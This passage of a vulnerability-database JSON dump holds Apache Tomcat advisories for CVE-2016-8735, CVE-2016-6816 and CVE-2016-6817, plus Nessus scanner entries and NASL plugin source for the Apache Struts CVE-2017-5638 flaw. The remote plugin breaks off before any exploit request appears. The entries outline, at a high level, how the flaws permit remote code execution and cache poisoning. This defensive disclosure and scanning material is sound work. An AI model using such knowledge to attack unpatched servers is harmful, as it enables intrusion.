{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-14T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 8.0.39", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-14T00:00:00", "id": "TOMCAT:604E2DE63F4E10D22151D29C4D2E7487", "href": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T22:05:16", "description": "**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767684](<https://svn.apache.org/viewvc?view=rev&rev=1767684>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 6.0.0 to 6.0.47\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767683](<https://svn.apache.org/viewvc?view=rev&rev=1767683>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 6.0.0 to 6.0.47", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-15T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 6.0.48", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-15T00:00:00", "id": "TOMCAT:DCB8C0E7C96DD2367CF48625F7A47EDF", "href": "https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T22:05:14", "description": "_Note: The issues below were fixed in Apache Tomcat 9.0.0.M12 but the release vote for the 9.0.0.M12 release candidate did not pass. Therefore, although users must download 9.0.0.M13 to obtain a version that includes fixes for these issues, version 9.0.0.M12 is not included in the list of affected versions._\n\n**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767644](<https://svn.apache.org/viewvc?view=rev&rev=1767644>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 9.0.0.M1 to 9.0.0.M11\n\n**Important: Denial of Service** [CVE-2016-6817](<https://vulners.com/cve/CVE-2016-6817>)\n\nThe HTTP/2 header parser entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.\n\nThis was fixed in revision [1765794](<https://svn.apache.org/viewvc?view=rev&rev=1765794>).\n\nThis issue was reported as [60232](<https://bz.apache.org/bugzilla/show_bug.cgi?id=60232>) on 10 October 2016 and the security implications identified by the Apache Tomcat Security Team on the same day. It was made public on 22 November 2016.\n\nAffects: 9.0.0.M1 to 9.0.0.M11\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767641](<https://svn.apache.org/viewvc?view=rev&rev=1767641>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 9.0.0.M1 to 9.0.0.M11", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 9.0.0.M13", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2016-11-08T00:00:00", "id": "TOMCAT:9E43DA1677EA0537439D1A6D19A16EC5", "href": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T22:05:16", "description": "_Note: The issues below were fixed in Apache Tomcat 8.5.7 but the release vote for the 8.5.7 release candidate did not pass. Therefore, although users must download 8.5.8 to obtain a version that includes fixes for these issues, version 8.5.7 is not included in the list of affected versions._\n\n**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767646](<https://svn.apache.org/viewvc?view=rev&rev=1767646>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 8.5.0 to 8.5.6\n\n**Important: Denial of Service** [CVE-2016-6817](<https://vulners.com/cve/CVE-2016-6817>)\n\nThe HTTP/2 header parser entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.\n\nThis was fixed in revision [1765798](<https://svn.apache.org/viewvc?view=rev&rev=1765798>).\n\nThis issue was reported as [60232](<https://bz.apache.org/bugzilla/show_bug.cgi?id=60232>) on 10 October 2016 and the security implications identified by the Apache Tomcat Security Team on the same day. It was made public on 22 November 2016.\n\nAffects: 8.5.0 to 8.5.6\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767645](<https://svn.apache.org/viewvc?view=rev&rev=1767645>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 8.5.0 to 8.5.6", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 8.5.8", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2016-11-08T00:00:00", "id": "TOMCAT:0DBA25EA40A6FEBF5FD9039D7F60718E", "href": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-12-05T20:51:52", "description": "The code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own (CVE-2016-6816). The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used (CVE-2016-8735). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-12T01:44:05", "type": "mageia", "title": "Updated tomcat package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-12-12T01:44:05", "id": "MGASA-2016-0417", "href": "https://advisories.mageia.org/MGASA-2016-0417.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2023-12-05T20:47:33", "description": "Arch Linux Security Advisory ASA-201611-22\n==========================================\n\nSeverity: High\nDate : 2016-11-23\nCVE-ID : CVE-2016-6816 CVE-2016-8735\nPackage : tomcat6\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package tomcat6 before version 6.0.48-1 is vulnerable to multiple\nissues including arbitrary code execution and information disclosure.\n\nResolution\n==========\n\nUpgrade to 6.0.48-1.\n\n# pacman -Syu \"tomcat6>=6.0.48-1\"\n\nThe problems have been fixed upstream in version 6.0.48.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-6816 (information disclosure)\n\nThe code that parsed the HTTP request line permitted invalid\ncharacters. This could be exploited, in conjunction with a proxy that\nalso permitted the invalid characters but with a different\ninterpretation, to inject data into the HTTP response. By manipulating\nthe HTTP response, the attacker could poison a web-cache, perform an\nXSS attack and/or obtain sensitive information from requests other then\ntheir own.\n\n- CVE-2016-8735 (arbitrary code execution)\n\nThe JmxRemoteLifecycleListener was not updated to take account of\nOracle's fix for CVE-2016-3427. Therefore, Tomcat installations using\nthis listener remained vulnerable to a similar remote code execution\nvulnerability.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code and disclose\nsensitive information.\n\nReferences\n==========\n\nhttps://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48\nhttp://www.openwall.com/lists/oss-security/2016/11/22/17\nhttp://www.openwall.com/lists/oss-security/2016/11/22/16\nhttps://access.redhat.com/security/cve/CVE-2016-6816\nhttps://access.redhat.com/security/cve/CVE-2016-8735", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-23T00:00:00", "type": "archlinux", "title": "[ASA-201611-22] tomcat6: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-23T00:00:00", "id": "ASA-201611-22", "href": "https://security.archlinux.org/ASA-201611-22", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:31:42", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:01:31", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-10-16T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:51:29", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = 